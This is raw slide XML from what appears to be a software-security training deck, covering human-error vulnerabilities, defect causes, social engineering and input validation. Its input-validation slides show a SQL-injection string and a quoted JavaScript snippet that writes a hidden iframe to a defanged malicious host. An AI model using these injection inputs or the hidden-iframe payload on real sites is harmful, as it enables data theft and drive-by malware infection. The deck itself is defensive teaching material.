          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Providing them directly to an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing files in unsecure locations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attaching unsecure devices to otherwise secure networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leaving sensitive information on unsecure devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Transferring electronically secured information to unsecure outputs, such as printed hard copy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passing highly sensitive information in unsecure email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Including sensitive information in a "Reply All" response that was meant to be "Reply."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accidentally addressing the wrong recipient in a confidential email.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A9B19D-B95B-4A37-B4D6-CDE46B1CDAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities Attributed to the Human Element (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{739D4A8D-018D-4242-A879-8D2E8AAFA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241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0123F2-42A5-4EAA-BD32-A83C32A0E2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411EDE7A-B868-4393-8C5C-DEE8BA9284FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1143000"/>
            <a:ext cx="8460150" cy="5302470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disabling or circumventing software security features.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enabling unsecure software features, such as file-sharing, remote access, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Skipping critical security checks to save time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Downloading and (unintentionally) installing malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visiting risky websites and blindly permitting malware to gain a foothold.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Falling for scams in email, text messaging services, and social networking sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allowing unauthorized people into secure locations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing security-related settings that they don't understand.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mistakes by software developers and system administrators:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accidentally changing the configuration of a firewall or server to a less secure configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forgetting to enable or re-enable important security monitoring or logging features.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypassing or disabling critical security checks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A9B19D-B95B-4A37-B4D6-CDE46B1CDAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities Attributed to the Human Element (Slide 2 or 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F341AC7-4387-4C15-91FD-E6695D8BB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14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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security defects may be placed in code maliciously.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More often, they are simply due to a development mistake, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A flaw in the design, or a failure to design for security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A programming error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mistaken or incomplete assumptions, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The environment in which software will operate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How specific APIs or functions work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access rights users will have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A change in the context in which the software runs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using third-party code that is not secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bugs introduced through maintenance updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Causes of Software Defects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="Image result for mistak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438635"/>
            <a:ext cx="3277658"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05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B7AF47-ED3A-424F-80D1-27DCF9D19BC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social Engineering Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DE08BEE-F719-4051-92CA-90F62B518B2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tailgating and piggybacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spear phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Baiting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click-baiting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social media reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8658657A-443F-49EC-872A-FDBD1D84B705}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Hand, Puppet, Snowman, Political, Alex, Hand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63" y="1429798"/>
            <a:ext cx="3540369" cy="47030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25350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CF4363-A9B6-4FBA-B50B-FB733388A87B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A552EBA7-128B-4A9A-BC5D-D385DBB00D4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="4763475" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User might:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter something undesirable or unexpected in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data entry fields within a web form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User interface control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL query string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cause problems such as overflowing a data buffer, confusing the system into thinking a command (rather than data) was entered, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You should:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect all data that users provide before acting on that data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reject or correct any unacceptable user-provided data before it can cause a problem.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49528901-9158-44E5-8891-989814700E26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Input </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flowchart: Data 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087284" y="1630990"/>
            <a:ext cx="1600200" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInputOutp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en-US" sz="1100" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Decision 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7094658" y="2884636"/>
            <a:ext cx="1371600" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDecis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en-US" sz="1100" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Connector: Elbow 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="7094658" y="1973890"/>
            <a:ext cx="152646" cy="1520346"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -438002"/>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6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780458" y="2312611"/>
            <a:ext cx="0" cy="572025"/>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780843" y="4011798"/>
            <a:ext cx="657552" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>good</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6491856" y="3094507"/>
            <a:ext cx="538930" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780458" y="4103836"/>
            <a:ext cx="0" cy="84916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7528005" y="1776050"/>
            <a:ext cx="679994" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7254678" y="3279173"/>
            <a:ext cx="1105687" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3869856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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Critical security component of many applications, since it protects against some of the most dangerous vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider developing a centralized input validation function to reduce complexity, increase consistency, and make it easier to improve and maintain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not rely solely on client-side input validation since client-side code is generally easier to bypass or modify than server side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All input to server operations should be validated on the server side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use client-side validation as well—to improve performance, for example.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation can check for a number of factors, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The type of data allowed (e.g., decimal number, currency)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The range of data allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The type of encoding allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which characters are allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The minimum and maximum length of data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input Validation (Slide 1 of 5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1271600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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%' or '1'='1'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input Validation (Slide 2 of 5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149624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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1302040"/>
            <a:ext cx="8573475" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript</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	do​cument.wr​ite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	('&lt;if​rame scrolling="no" width="1" height="1" border="0" 	frameborder="0" 	src="hxxp://43kaylia.eu/xxx1/kqxleqjpcoh8.php"&gt;&lt;/iframe&gt;')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
